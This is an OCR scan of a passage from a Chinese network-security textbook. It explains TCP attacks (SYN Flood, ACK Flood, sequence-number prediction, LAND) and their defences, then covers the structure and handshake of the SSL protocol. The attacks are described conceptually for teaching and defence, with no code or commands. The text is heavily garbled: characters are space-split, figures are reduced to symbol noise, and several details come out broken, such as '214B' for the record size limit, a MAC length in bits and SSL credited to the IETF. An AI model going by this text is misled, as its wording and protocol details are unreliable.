的 分 片 。 面 向 字 节 流传 输 方式 的 好 处 在 于 ,应 用 程序 产生 的 数据 可 以 被 协议 分 割 成 最 合适 
的 大 小 来 发 送 , 或 者 通过 缓存 组 合成 合适 的 数据 块 大 小 后 发 送 。 此 外 , 字 节 流 方式 利用 
TCP 协议 将 应 用 程序 和 网 络 传输 分 隔 开 ,为 流传 输 服务 提供 了 一 个 一 致 的 接口 。 

3. TCP 协议 面临 的 安全 威胁 

针对 TCP 的 攻击 主要 包括 4 种 , 即 SYN Flood 攻击 ACK Flood 攻击 .序列 号 测试 攻 
击 和 LAND 攻击 。 下 面 就 对 这 4 种 攻击 分 别 进行 说 明 。 

1) SYN Flood 攻击 

SYN Flood( 同 步 泛 洪 技术 ) 攻 击 是 拒绝 服务 攻击 (DDoS) 的 一 种 ,恶意 客户 程序 用 户 使 
用 虚假 IP 地址 ,不 断 向 服务 器 各 个 端口 发 送 SYN 数据 包 以 达到 建立 不 完整 连接 ,使 得 服务 
器 超载 直至 陷 人 瘫痪 状态 。 

SYN Flood 之 所 以 会 造成 危害 ,要 从 操作 系统 TCP/IP 协议 栈 的 实现 说 起 ,根据 TCP/ 
IP 协议 特点 ,在 数据 传输 之 前 ,两 个 节点 之 间 必 须 首 先 通过 “三 次 握手 "方式 建立 连接 。 

服务 器 端 首先 打开 一 个 TCP 端口 , 侦 听 到 达 该 端口 的 请 求 。 当 客户 端 请 求 服务 时 , 客 
户 端 发 起 一 个 TCP SYN fJ; 服务 器 端 接收 到 该 请 求 , 即 回复 一 个 TCP SYN ACK 包 , 同 时 
分 配 一 个 TCB(Transmission Control Block ,任务 控制 块 ) ,一 个 TCB 至 少 需要 280B, 有 些 
系统 甚至 需要 1300B, 然 后 转 为 半 开 连接 状态 (SYN-RECEIVED)( 某 些 系 统 在 Socket 连接 
的 实现 上 最 多 可 开启 512 个 半 开 连接 ); 然后 等 待 客户 端的 ACK 包 , 以 便 完成 “三 次 握手 ” 
过 程 。 这 个 过 程 如 图 2-18 所 示 。 

EI. 服务 器 服务 器 









CD E ÉSYN @ 发 送 SYN 
收 到 SYN 
发 送 SYN, ACK@ 


收 到 SYN 


发 送 SYN, ACK@ 
收 到 SYN 


© 发 送 ACK 999... 


图 2-18 半 开 连接 
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在 这 个 过 程 中 ,客户 端 可 以 不 理会 服务 器 端的 TCP SYN ACK 包 , 而 是 继续 发 送 假冒 
TCP SYN 包 , 在 没有 超时 之 前 服务 器 端 分 配 TCP 保持 客户 端 请 求 的 状态 信息 。 服 务 器 端 
的 资源 总 是 有 限 的 ,如 果 达 到 足够 多 的 假冒 TCP SYN 包 , 则 会 造成 服务 器 资源 的 枯竭 , 因 
而 无 法 为 新 到 达 的 访问 分 配 资源 ,从 而 造成 拒绝 服务 攻击 的 效果 ,如 图 2-19 所 示 。 





SEQ=ISNA=1000(SYN=1) 
SEQ-ISN4-2000 ACKA=1001(SYN=1, ACK-I) “中 
> Gs: 
z 
X= 
z= 
X= 








2-19 SYN Flood 攻击 


客户 端 发 送 的 TCP SYN 包 看 起 来 是 有 效 的 ,但 由 于 IP 地 址 是 虚假 的 ,因此 服务 器 不 
能 通过 向 客户 端 发 送 TCP RST 包 来 关闭 连接 。 服 务 器 响应 TCP SYN ACK 包 , 客 户 端 总 
能 知道 哪个 端口 是 开放 的 。 

为 了 防范 SYN Flood 攻击 ,大 多 数 主 流 操作 系统 采用 了 SYN Cookie 技术 。 其 工作 原 
理 如 下 。 

当 服 务 器 接收 到 一 个 SYN 报 文 段 时 ,服务 器 无 法 判断 该 请 求 是 否 合法 ,因此 不 能 生成 
一 个 半 开 TCP 连接 ; 否则 可 能 造成 SYN Flood 攻击 。 服 务 器 采用 一 种 特殊 方式 生成 一 个 
特殊 序列 号 ,该 序列 号 (也 称 为 Cookie) 由 SYN 报 文 段 的 源 IP 地 址 、 目 的 TP 地址、 端口 号 和 
服务 器 生成 的 一 个 秘密 数 构 成 ,Cookie 二 HMAC(Secret,SIP,Sport, DIP, DPort); 服务 器 
发 送 具 有 特殊 序列 号 的 SYN ACK 报 文 段 。 在 这 个 过 程 中 ,服务 器 不 保存 对 应 于 SYN 的 状 
态 信息 和 所 生成 的 Cookie, 因 此 不 占用 资源 。 

如 果 SYN 请 求 是 合法 的 , 则 会 发 送 一 个 ACK 报 文 段 完 成 “三 次 握手 过程 。 服 务 器 收 
到 该 ACK 报 文 段 后 ,需要 验证 请 求 是 否 为 前 面 发 送 的 某 个 SYN 报 文 段 对 应 的 ACK 报 文 
段 。 因 为 服务 器 没有 设 定 关于 前 面 接收 到 的 SY N 报 文 段 的 信息 ,因此 这 里 利用 Cookie 验 
证 一 个 合法 的 ACK 报 文 段 ,其 确认 字段 的 值 为 SYN ACK 报 文 段 中 的 序列 号 加 1。 服 务 器 
根据 ACK 报 文 段 中 的 信息 用 同样 的 秘密 数 生成 一 个 新 的 Cookie, 如果 该 Cookie 加 1 等 于 
ACK 值 , 则 服务 器 就 认为 该 ACK 对 应 于 前 面 的 SYN 报 文 段 是 合法 的 请 求 , 此 时 为 其 分 配 

SYN Cookie 可 以 防范 “ 半 开 连接 ”拒绝 服务 攻击 ,但 是 无 法 防范 “全 连接 ”拒绝 服务 攻 
击 。“ 全 连接 ”拒绝 服务 攻击 是 指 每 个 TCP 连接 均 完 成 了 “三 次 握手 "过程 ,因此 需要 为 每 个 
连接 分 配 资源 ,从 而 可 能 造成 资源 的 枯竭 而 导致 拒绝 服务 攻击 。 

2) ACK Flood 攻击 

ACK Flood 攻击 是 在 TCP 连接 建立 之 后 ,所 有 的 数据 传输 TCP 报 文 都 是 带 有 ACK 
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标志 位 的 ,主机 在 接收 到 一 个 带 有 ACK 标志 位 的 数据 包 的 时 候 ,需要 检查 该 数据 包 所 表示 
的 连接 四 元 组 是 否 存在 ,如 果 存 在 则 检查 该 数据 包 所 表示 的 状态 是 否 合 法 ,然后 再 向 应 用 层 
传递 该 数据 包 。 如 果 在 检查 中 发 现 该 数据 包 不 合法 ,如 该 数据 包 所 指向 的 目的 端口 在 本 机 
并 未 开放 , 则 主机 操作 系统 协议 栈 会 回应 RST 包 告 诉 对 方 此 端口 不 存在 。 这 里 ,服务 器 要 
进行 两 个 操作 , 即 查 表 、 回 应 ACK/RST。 这 种 攻击 方式 显然 没有 SYN Flood 给 服务 器 带 
来 的 冲击 大 ,因此 攻击 者 一 定 要 用 大 流量 ACK 小 包 冲 击 才 会 对 服务 器 造成 影响 。 

按照 之 前 对 TCP 协议 的 理解 ,随机 源 IP 的 ACK 小 包 应 该 会 被 服务 器 很 快 丢 弃 , 因 为 
在 服务 器 的 TCP 堆栈 中 没有 这 些 ACK 包 的 状态 信息 。 通 过 试验 测试 ,发 现 有 一 些 TCP 服 
务 对 ACK Flood 比较 敏感 ,例如 JSP Server, 在 数量 不 多 的 ACK 小 包 的 冲击 下 ,JSP Server 
很 难处 理 正常 的 连接 请 求 ; 对 于 Apache sk IIS 来 说 ,10kb/s 的 ACK Flood 不 会 构成 威胁 ， 
但 是 更 多 数量 的 ACK Flood 会 造成 服务 器 网 卡 中 断 频 率 过 高 .负载 过 重 而 停止 响应 。 可 以 
肯定 的 是 ,ACK Flood 不 但 可 以 危害 路 由 器 等 网 络 设 备 ,而 且 对 服务 器 上 的 应 用 也 有 不 小 
的 影响 。 如 果 没 有 开放 端口 ,服务 器 将 直接 丢弃 ,这 将 会 耗费 服务 器 的 CPU 资源 ; 如 果 端 
口 开放 , 则 服务 器 回应 RST, 如 图 2-20 所 示 。 


已 经 建立 的 TCP 连 接 











产生 随机 源 IP 








和 随机 源 端口 |------- SEQ=1000 ACK=209 — 
RST = 
产生 随机 源 IP | 2X — 
ËD 和 随机 源 端口 | ------- SEQ-1001 ACK-2092 
c NE RST O 
SSO popup — 
和 随机 源 端 口 








2-20 ACK Flood 攻击 


利用 对 称 性 判断 来 分 析 是 否 存 在 攻击 。 对 称 性 判断 就 是 收 包 异常 大 于 发 包 , 因 为 攻击 
者 通常 会 采用 大 量 ACK 包 ,并 且 为 了 提高 攻击 速度 ,一 般 采 用 内 容 基 本 一 致 的 小 包 发 送 。 
这 可 以 作为 判断 是 否 发 生 ACK Flood 的 依据 ,但 是 从 目前 已 知情 况 来 看 ,很 少 有 单纯 使 用 
ACK Flood 攻击 的 ,通常 都 会 和 其 他 攻击 方法 混合 使 用 ,因此 ,很 容易 产生 误 判 。 一 些 防火 
墙 应 对 的 方法 是 : 建立 一 个 Hash 表 , 用 来 存放 TCP 连接 “状态 ”, 相 对 于 主机 的 TCP 协议 
栈 实现 来 说 ,状态 检查 的 过 程 相对 简化 。 例 如 ,不 作 序 列 号 的 检查 ,不 作 包 乱 序 的 处 理 ,只 是 
统计 一 定时 间 内 是 否 有 ACK 包 在 该 “连接 ”( 即 四 元 组 ) 上 通过 ,从 而 “大 致 "确定 该 “连接 ” 
是 否 是 “活动 的 ”。 

3) 序列 号 测试 攻击 

在 一 个 TCP 连接 中 ,接收 方 希望 接收 到 给 定 序 列 号 的 数据 包 , 不 是 接收 方 期 望 的 数据 
包 则 会 丢弃 。 在 这 一 约定 中 ,TCP 端口 号 和 序列 号 成 为 判断 数据 包 是 否 成 为 所 需 数据 包 的 
主要 依据 ,如 果 这 两 个 因素 能 被 攻击 者 确定 ,那么 攻击 者 可 以 构造 一 个 TCP 包 发 送出 去 并 
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被 接收 方 接收 。 如 果 所 构造 的 TCP 包 里 包含 的 内 容 或 者 所 设置 的 标志 位 并 非 发 送 方 的 后 
续 行为 , 则 形成 攻击 。 由 于 一 旦 建立 连接 后 ,端口 号 是 不 变 的 ,因此 攻击 的 难点 就 在 于 序列 
号 预测 。 如 果 攻 击 者 能 够 窃听 一 个 TCP 会 话 中 两 端 交 互 的 流量 , 则 能 够 容易 地 得 出 接收 方 
期 望 的 TCP 包 的 序列 号 ,如 图 2-21 所 示 。 














猜 中 TCP 端 口号 和 序列 号 






攻击 者 断 开 主机 A 和 服务 器 
2-21 序列 号 预测 攻击 


试想 一 下 ,攻击 者 能 够 获得 发 送 者 的 数据 包 , 则 可 以 对 接收 方 的 行为 进行 推理 ,根据 
TCP 协议 ,如 果 接 收 方 已 经 接收 到 序列 号 为 S 的 TCP 包 之 前 的 所 有 TCP 报 文 段 , 则 下 一 
个 所 期 望 接收 到 的 TCP 包 的 序列 号 为 S。 如 果 攻 击 包 中 包含 非法 的 内 容 , 则 会 破坏 数据 传 
输 的 完整 性 和 可 用 性 。 攻 击 者 也 可 以 向 会 话 的 两 端 同时 发 送 RST 标志 设置 为 1 的 TCP 报 
文 段 , 从 而 终止 两 端的 连接 。 

4) LAND 攻击 

LAND(Local Area Network Denial) 攻 击 是 拒绝 服务 攻击 的 一 种 ,攻击 者 构造 一 个 特 
殊 的 TCP SYN 攻击 包 , 该 包 的 源 IP 地 址 和 目的 IP 地 址 均 为 目标 主机 的 IP 地 址 。 目 标 主 
机 在 接收 到 这 个 SYN 报 文 后 ,就 会 向 该 报 文 的 源 地 址 (就 是 目标 主机 ) 发 送 一 个 TCP ACK 
报 文 ,建立 一 个 TCP 空 连接 ,每 一 个 这 样 的 连接 都 将 保留 直到 超时 为 止 ,从 而 导致 目标 主机 
连续 地 自我 响应 (如 图 2-22 所 示 )。LAND 攻击 是 由 于 操作 系统 的 设计 缺陷 造成 的 ,主流 操 
作 系统 已 经 基本 消除 了 这 些 缺 陷 。 




















目的 地 址 和 源 地 址 SEQ=2000 ACKA=1001 
^ As de SYN=1, ACK- 
均 为 服务 器 地 址 SEQ=ISN,=1000(SYN=1) (SYN HAC 1) 
ËD -—-- Ñ 一 `. : 
KS A YN 
SR SEQ-1000. ACK=2001(ACK 标 志 位 为 1) 
攻击 者 服务 器 NC ew. 
已 经 建立 的 TCP 空 连接 


图 2-22 LAND 攻击 


防火 墙 设置 安全 策略 可 以 防御 LAND 攻击 : 对 网 络 分 组 的 源 IP 和 目的 IP 的 检查 来 判 
断 是 否 为 LAND 攻击 ,从 而 丢弃 LAND 攻击 包 ; 对 路 由 器 设置 入口 /出 口 过 滤 规 则 封 堵 
LAND 攻击 包 。 


40 网 络 安全 技术 (第 2 版) 





4. TCP 协议 的 安全 机 制 

TCP 协议 本 身 没 有 加 密 、 身 份 鉴别 等 安全 特性 ,要 向 上 层 应 用 提供 安全 通信 的 机 制 必 
须 在 TCP 之 上 建立 一 个 安全 通信 和 层次。 针对 TCP 协议 的 缺陷 ,因特网 工程 任务 组 (IETF) 
在 传输 层 和 应 用 层 之 间 设 立 安全 套 接 字 层 (Secure Socket Layer, SSL) ,提供 3 种 基本 的 安 
全 服务 ,主要 目的 是 应 用 层 使 用 SSL 的 安全 机 制 建立 客户 端 ( 浏 览 器 ) 与 服务 器 之 间 的 安全 
TCP 连接 。 

1) 安全 套 接 字 层 

SSL 采用 公 钥 口令 技术 ,提供 信息 保密 、 信 息 完整 性 和 双向 认证 3 种 安全 服务 ,是 主要 
用 于 Web 的 安全 传输 协议 。SSL 是 服务 器 之 上 的 一 个 加 密 系统 ,确保 在 浏览 器 与 服务 器 之 
间 传 输 的 数据 是 安全 与 隐 密 的 。 服 务 器 和 浏览 器 使 用 SSL 进行 安全 通信 ,服务 器 必须 具有 
密 钥 对 和 证 书 。 

密 钥 对 (Key Pair) 包 括 一 个 公 钥 和 一 个 私 钥 ,用 来 对 消息 进行 加 密 和 解密 ,以 确保 在 因 
特 网 上 传输 时 的 隐 密 性 和 机 密 性 。 证 书 (Certificate) 用 来 进行 身份 验证 或 者 身份 确认 ,可 以 
是 自 签 (Self-signed) 证 书 或 颁发 (Issued) 证 书 ; 自 签证 书 是 为 自己 私有 的 Web 网 络 创建 的 
证 书 , 颁 发 证 书 是 认证 中 心 (Certificate Authority,CA) 或 证 书签 署 者 颁发 的 证 书 。 

2) SSLv3 协议 结构 

SSL 协议 与 应 用 层 协 议 无 关 , 高 层 的 应 用 层 协 议 (HTTP、FTP、Telnet 等 ) 建 立 于 SSL 
协议 之 上 。SSL 协议 在 应 用 层 协议 通信 之 前 已 经 完成 加 密 算法 、 通 信和 密 钥 的 协商 和 服务 器 
认证 ,在 此 之 后 ,应 用 层 协议 所 传送 的 数据 都 被 加 密 , 从 而 保证 了 通信 的 私密 性 。 

SSL 是 基于 TCP 来 提供 一 种 可 靠 的 端 到 端的 安全 服务 ,是 两 层 协议 。 从 协议 栈 层 次 关 
系 看 ,SSL 协议 位 于 传输 层 与 应 用 层 之 间 ,分 为 两 层 , 即 SSL 协商 层 和 SSL 记录 层 , 如 图 2-23 
和 图 2-24 所 示 。 








Internet 选项 





SA ”安全 ”隐私 内 容 连接 WE mh 
设置 








回 将 提交 的 POST 重 定向 到 不 允许 发 送 的 区 域 时 发 出 警告 ^ 
回 启用 DOM 存储 

EZ 启用 SmartScreen 算 选 器 m 
回 启用 本 机 XMLHTTP 支持 由 
EZ 启用 集成 Windows WE » 
O RASERI 

回 使 用 SSL3.0 

回 使 用 TLs 10 

E 使 用 TLS 1.1 

E) 使 用 TLS 12 

C 向 你 在 Internet Explorer 中 访问 的 站 点 发 送 " 请 入 加 路" 请 求 * 

L] 允许 活动 内 容 在 我 的 电脑 "的 文件 中 运行 * 

L] 允许 来 和 CD 的 活动 内 容 在 "我 的 电脑 "中 运行 * 





应 用 层 
SSL 协商 层 
SSL 记录 层 

传输 层 
网 络 接口 层 



































< Ex RET —— 














2-23 SSL 层次 结构 图 2-24 IE 支持 的 SSL 版 本 


在 SSL 记录 层 ,SSL 记录 协议 (Record Protocol) 建 立 在 TCP 协议 之 上 ,为 高 层 协议 提 
供 数据 封装 、 压 缩 、 加 密 等 基本 功能 。 在 SSL 协商 层 ,SSL 握手 协议 (Handshake Protocol) 
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建立 在 SSL 记录 协议 之 上 ,用 于 在 实际 的 数据 传输 开始 前 ,通信 双方 协商 加 密 算法 .通信 密 
钥 、 服 务 器 认证 等 。 

SSL 是 一 个 协议 套件 ,SSL 是 由 SSL 握手 协议 .SSL 修改 密 文 协议 (Change Cipher Spec), 
SSL 警告 协议 (Alert) 和 SSL 记录 协议 等 组 成 的 一 个 协议 族 , 如 图 2-25 所 示 。 





SSL 握手 协议 | SSL 修改 密 文 协议 | SSL 警告 协议 
SSL 记录 协议 
TCP 协议 
IP 协 议 


























图 2-25 SSL 体系 结构 


(D SSL 记录 协议 。SSL 记录 协议 为 SSL 连接 提供 两 种 服务 , 即 机 密 性 和 报 文 完整 性 。 
在 SSL 协议 中 ,所 有 的 传输 数据 都 被 封装 在 记录 中 。 记 录 是 由 记录 头 和 记录 数据 (长 度 不 
为 0) 组 成 的 。SSL 记录 协议 主要 负责 对 上 层 的 数据 (SSL 握手 协议 .SSL 修改 密 文 协议 、 
SSL 警告 协议 和 应 用 层 协议 报 文 ) 进 行 分 块 .计算 、 增 加 MAC 值 . 加 密 , 并 把 处 理 后 的 记录 
块 传输 给 对 端 。 

SSL 记录 协议 包括 记录 头 和 记录 数据 格式 的 规定 。SSL 记录 协议 定义 了 传输 数据 的 
格式 ,主要 完成 分 组 和 组 合 . 压 缩 和 解压 缩 以 及 消息 认证 和 加 密 等 。SSL 记录 协议 主要 操 
作 流程 如 图 2-26 所 示 。 








应 用 数据 





(0 分 段 











Q) 压缩 
(3) 增加 MAC 值 


(4) 加 密 





(5) 增加 SSL 记 录 


图 2-26 SSL 记录 协议 操作 流程 


CD 每 个 上 层 应 用 数据 被 分 成 214B 或 更 小 的 数据 块 。 记 录 中 包含 类 型 .版 本 号 .长度 和 
数据 字段 。 

© 压缩 是 可 选 的 ,并 且 是 无 损 压 缩 , 压 缩 后 内 容 长 度 的 增加 不 能 超过 1024B。 

© 在 压缩 数据 上 计算 消息 认证 MAC, 

@ 对 压缩 数据 及 MAC 进行 加 密 。 

@ 增加 SSL 记录 。 

SSL 记录 协议 字段 结构 由 内 容 类 型 .主要 版 本 、 次 要 版 本 .压缩 长 度 等 组 成 ,如 图 2-27 
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内 容 类 型 (8 位 ) | 主要 版 本 (8 位 ) | 次 要 版 本 (8 位 ) | 压缩 长 度 (16 位 ) 
明文 (压缩 可 选 ) 
MAC(0.16 或 20 位 ) 


























2-27 SSL 记录 协议 字段 结构 


内 容 类 型 ,8 位 ,封装 的 高 层 协议 。 
主要 版 本 ,8 位 ,使 用 的 SSL 主要 版 本 ,SSLv3 定义 的 内 容 类 型 是 担 手 协议 .警告 协议 、 
修改 密 文 协议 和 应 用 数据 协议 。 

次 要 版 本 ,8 位 ,使 用 的 SSL 次 要 版 本 。 对 于 SSLv3, 值 为 0。 

压缩 长 度 ,16 位 。 

明文 (如 果 选 用 压缩 则 是 压缩 数据 ) ,以 B 为 单位 的 长 度 。 

(2) SSL 握手 协议 。 

(D 消息 交换 。 

SSL 握手 协议 被 封装 在 记录 协议 中 ,该 协议 允许 服务 器 与 客户 机 在 应 用 程序 传输 和 接 
收 数据 之 前 互相 认证 ,协商 加 密 算法 和 密 钥 。 在 初次 建立 SSL 连接 时 ,服务 器 与 客户 机 交 
换 一 系列 消息 。 

这 些 消息 交换 能 够 实现 以 下 操作 。 

a. 客户 机 认证 服务 器 。 

b. 允许 客户 机 与 服务 器 选择 双方 都 支持 的 口令 算法 。 

c. 可 选择 的 服务 器 认证 客户 。 

d. 使 用 公 钥 加 密 技术 生成 共享 密 钥 。 

e. 建立 加 密 SSL 连接 。 

@ 身份 验证 过 程 。 

SSL 握手 协议 用 来 协商 通信 过 程 中 使 用 的 加 密 套 件 ( 加 密 算法 、 密 钥 交 换算 法 和 MAC 
算法 等 ) ,在 服务 器 和 客户 端 之 间 安 全 地 交换 密 钥 ,实现 服务 器 和 客户 端的 身份 验证 。SSL 
握手 协议 是 在 应 用 程序 数据 传输 之 前 使 用 ,包含 4 个 阶段 : 第 一 个 阶段 建立 安全 能 力 ; 第 二 
个 阶段 服务 器 鉴别 和 密 钥 交换 ; 第 三 个 阶段 客户 鉴别 和 密 钥 交换 ; 第 四 个 阶段 完成 握手 协 
议 。SSL 握手 协议 过 程 如 图 2-28 所 示 。 

a 建立 安全 能 力 。 客 户 机 向 服务 器 发 送 client. hello 报 文 ,服务 器 向 客户 机 回应 server_ 
hello 报 文 。 建 立 的 安全 属性 包括 协议 版 本 会话 ID 、 密 文 族 、. 压 缩 方法 ,同时 生成 并 交换 用 
于 防止 重 放 攻击 的 随机 数 。 密 文 族 参数 包括 密 钥 交换 方法 (Deffie-Hellman 密 钥 交换 算法 、 
基于 RSA 的 密 钥 交换 和 另 一 种 实现 在 Fortezza Chip 上 的 密 钥 交换 )、 加 密 算法 (DES、 
RC4、RC2 .3DES 等 ) .MAC 算法 (MD5 或 SHA-1) .加密 类 型 ( 流 或 分 组 ) 等 内 容 。 

b. 认证 服务 器 和 密 钥 交换 。 在 hello 报 文 之 后 ,如 果 服 务 器 需要 被 认证 ,服务 器 将 发 送 
其 证 书 。 如 果 需 要 ,服务 器 还 要 发 送 server key exchange: 然后 ,服务 器 可 以 向 客户 发 送 
certificate_request 请 求证 书 。 服 务 器 总 是 发 送 server_hello_done 报 文 , 指 示 服 务 器 的 hello 
阶段 结束 。 

c. 认证 客户 和 密 钥 交换 。 客 户 一 旦 收 到 服务 器 的 server_hello_done 报 文 ,客户 将 检查 
服务 器 证 书 的 合法 性 (如 果 服 务 器 要 求 ) ,如果 服务 器 向 客户 请 求 了 证 书 ,客户 必须 发 送 客户 
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客户 方 服务 方 


客户 问候 消息 一 一 一 一 





服务 问候 消息 
一 Certificate* 

密 钥 交换 消息 * 

客户 身份 证 书 请 求 消息 * 
问候 结束 消息 











客户 Certificate ~ = 
密 钥 交换 消息 — 
Certificate 检 验 消 息 * — — — 
改变 加 密约 定 一 一 一 一 一 一 ~ 


d: 
结束 —— 





改变 加 密约 定 
结束 
应 用 数据 应 用 数据 


2-28 SSL 握手 协议 过 程 








证 书 , 然 后 发 送 client. key. exchange 报 文 , 报 文 的 内 容 依 赖 于 client hello 与 server. hello 
定义 的 密 钥 交换 的 类 型 。 最 后 ,客户 可 能 发 送 client_verify 报 文 来 校 验 客户 发 送 的 证 书 , 这 
个 报 文 只 能 在 具有 签名 作用 的 客户 证 书 之 后 发 送 。 

d. 结束 。 客 户 发 送 change_cipher_spec 报 文 并 将 挂 起 的 CipherSpec 复制 到 当前 的 
CipherSpec。 这 个 报 文 使 用 的 是 修改 密 文 协议 。 然 后 ,客户 在 新 的 算法 、 对 称 密 钥 和 MAC 
秘密 之 下 立即 发 送 finished HX. finished 报 文 验 证 密 钥 交换 和 鉴别 过 程 是 成 功 的 。 服 务 
器 对 这 两 个 报 文 响应 ,发 送 自己 的 change_cipher_spec 报 文 和 finished RX. HFR, A 
户 与 服务 器 可 以 发 送 应 用 层 数 据 了 。 

@ 服务 器 认证 过 程 。 

当 客户 从 服务 器 端 传送 的 证 书 中 获得 相关 信息 时 ,需要 检查 以 下 内 容 来 完成 对 服务 器 
的 认证 。 

a. 时 间 是 否 在 证 书 的 合法 期 限 内 。 

b. 签发 证 书 的 机 关 是 否 是 客户 端 信任 的 。 

c. 签发 证 书 的 公 钥 是 否 符合 签发 者 的 数字 签名 。 

d. 证 书 中 的 服务 器 域名 是 否 符合 服务 器 自己 真正 的 域名 。 

e. 服务 器 被 验证 成 功 后 ,客户 继续 进行 握手 过 程 。 

© 客户 身份 认证 过 程 。 

同样 地 ,服务 器 从 客户 传送 的 证 书 中 获得 相关 信息 认证 客户 的 身份 ,需要 检查 以 下 
几 项 。 

a. 用 户 的 公 钥 是 否 符合 自己 的 数字 签名 。 

b. 时 间 是 否 在 证 书 的 合法 期 限 内 。 

c. 签发 证 书 的 机 关 是 否 是 服务 器 信任 的 。 

d. 用 户 的 证 书 是 否 被 列 在 服务 器 的 LDAP 里 用 户 的 信息 中 。 

e. 得 到 验证 的 用 户 是 否 仍然 有 权限 访问 请 求 的 服务 器 资源 。 

(3) SSL 修改 密 文 协 议 。 为 了 保障 SSL 传输 过 程 的 安全 性 ,客户 端 和 服务 器 双方 应 该 
每 隔 一 段 时 间 改 变 加 密 规 范 , 所 以 有 了 SSL 修改 密 文 协议 。SSL 修改 密 文 协议 是 3 个 高 层 
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的 特定 协议 之 一 ,也 是 其 中 最 简单 的 一 个 。 在 客户 端 和 服务 器 完成 握手 协议 之 后 , 它 需 要 向 
对 方 发 送 相关 消息 (该 消息 只 包含 一 个 值 为 1 的 单字 节 ), 通 知 对 方 随后 的 数据 将 用 刚刚 协 
商 的 口令 规范 算法 和 关联 的 密 钥 处 理 , 并 负责 协调 本 方 模块 按照 协商 的 算法 和 密 钥 工 作 。 

在 SSL 修改 密 文 协议 中 ,客户 端 和 服务 器 端 通过 口令 变化 协议 通知 对 端 ,随后 的 报 文 
都 将 使 用 新 协商 的 加 密 套件 和 密 钥 进行 保护 和 传输 。 

(D SSL 警告 协议 。SSL 警告 协议 是 用 来 为 对 等 实体 传递 SSL 的 相关 警告 。 如 果 在 通 
信 过 程 中 某 一 方 发 现任 何 异 常 ,就 需要 给 对 方 发 送 一 条 警示 消息 通告 。SSL 警告 协议 用 来 
向 通信 对 端 报告 告警 信息 ,消息 中 包含 告警 的 严重 级 别 和 描述 。 警 示 消 息 有 以 下 两 种 。 

(D Fatal 错误 ,如 传递 数据 过 程 中 发 现 错误 的 MAC, 双 方 就 需要 立即 中 断 会 话 , 同 时 消 
除 自己 缓冲 区 相应 的 会 话 记录 。 

© Warning 消息 ,这 种 情况 ,通信 双方 通常 都 只 是 记录 日 志 , 而 对 通信 过 程 不 造成 任何 
影响 。SSL 握手 协议 可 以 使 得 服务 器 和 客户 能 够 相互 鉴别 对 方 ,协商 具体 的 加 密 算 法 和 
MAC 算法 以 及 保密 密 钥 ,用 来 保护 在 SSL 记录 中 发 送 的 数据 。 

3) SSL 协议 服务 

SSL 协议 提供 的 服务 主要 有 : @ 认 证 用 户 和 服务 器 ,确保 数据 发 送 到 正确 的 客户 机 和 
服务 器 ; 四 加密 数 据 以 防止 数据 中 途 被 窃取 ; @ 维 护 数据 的 完整 性 ,确保 数据 在 传输 过 程 
中 不 被 算 改 。 

SSL 协议 的 工作 流程 分 为 服务 器 认证 阶段 和 用 户 认证 阶段 。 

CD 服务 器 认证 阶段 : 

a. 客户 端 向 服务 器 发 送 一 个 开始 信息 “Hello” 以 便 开始 一 个 新 的 会 话 连 接 。 

b. 服务 器 根据 客户 的 信息 确定 是 否 需要 生成 新 的 主 密 钥 ,如 需要 则 服务 器 在 响应 客户 
的 “Hello” 信 息 时 将 包含 生成 主 密 钥 所 需 的 信息 。 

c. 客户 根据 收 到 的 服务 器 响应 信息 ,产生 一 个 主 密 钥 ,并 用 服务 器 的 公开 密 钥 加 密 后 
传送 给 服务 器 。 

d. 服务 器 恢复 该 主 密 钥 ,并 返回 给 客户 一 个 用 主 密 钥 认证 的 信息 ,以 此 让 客户 认证 服 
务 器 。 

Q 用 户 认证 阶段 : 

a. 在 此 之 前 ,服务 器 已 经 通过 了 客户 认证 ,这 一 阶段 主要 完成 对 客户 的 认证 。 

b. 经 认证 的 服务 器 发 送 一 个 提问 给 客户 ,客户 则 返回 (数字 ) 签 名 后 的 提问 和 其 公开 密 
钥 , 从 而 向 服务 器 提供 认证 。 

SSL 通过 握手 过 程 在 客户 端 和 服务 器 之 间 协 商会 话 参 数 ,并 建立 会 话 。 会 话 包含 的 主 
要 参数 有 会 话 ID、 对 方 的 证 书 、 加 密 套 件 ( 密 钥 交 换算 法 、 数 据 加 密 算法 和 MAC 算法 等 ) 及 
主 密 钥 (Master Secret)。 通 过 SSL 会 话 传 输 的 数据 ,都 将 采用 该 会 话 的 主 密 钥 和 加 密 套 件 
进行 加 密 、 计 算 MAC 等 处 理 。 不 同情 况 下 ,SSL 握手 过 程 存在 差异 。 下 面 分 别 描述 以 下 3 
种 情况 下 的 握手 过 程 。 

CD 只 验证 服务 器 的 SSL 握手 过 程 。 只 需要 验证 SSL 服务 器 身份 ,不 需要 验证 SSL 客 
户 端 身份 ,SSL 的 握手 过 程 如 图 2-29 所 示 。 

SSL 客户 端 通过 Client Hello 消息 将 它 支 持 的 SSL 版 本 、 加 密 算法 、 密 钥 交 换算 法 、 
MAC 算法 等 信息 发 送 给 SSL 服务 器 。 
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2-29 ”只 验证 服务 器 的 SSL 握手 过 程 


SSL 服务 器 确定 本 次 通信 采用 的 SSL 版 本 和 加 密 套 件 ,并 通过 Server Hello 消息 通知 
给 SSL 客户 端 。 如 果 SSL 服务 器 允许 SSL 客户 端 在 以 后 的 通信 中 重用 本 次 会 话 , 则 SSL 
服务 器 会 为 本 次 会 话 分 配 会 话 ID ,并 通过 Server Hello 消息 发 送 给 SSL 客户 端 。 

SSL 服务 器 将 携带 自己 公 钥 信息 的 数字 证 书 通过 Certificate 消息 发 送 给 SSL 客户 端 。 

SSL 服务 器 发 送 Server Hello Done 消息 ,通知 SSL 客户 端 版 本 和 加 密 套 件 协商 结束 ， 
开始 进行 密 钥 交换 。 

SSL 客户 端 验证 SSL 服务 器 的 证 书 合法 后 ,利用 证 书 中 的 公 钥 加 密 SSL 客户 端 随机 生 
成 的 前 主 密 钥 ,并 通过 Client Key Exchange 消息 发 送 给 SSL 服务 器 。 

SSL 客户 端 发 送 Change Cipher Spec 消息 ,通知 SSL 服务 器 后 续 报 文 将 采用 协商 好 的 
密 钥 和 加 密 套 件 进行 加 密 和 MAC 计算 。 

SSL 客户 端 计算 已 交互 的 握手 消息 ( 除 Change Cipher Spec 消息 外 所 有 已 交互 的 消息 ) 
的 Hash 值 ,利用 协商 好 的 密 钥 和 加 密 套件 处 理 Hash 值 ( 计 算 并 添加 MAC (ñ 加密 等 ) ,并 
通过 Finished 消息 发 送 给 SSL 服务 器 。SSL 服务 器 利用 同样 的 方法 计算 已 交互 的 握手 消 
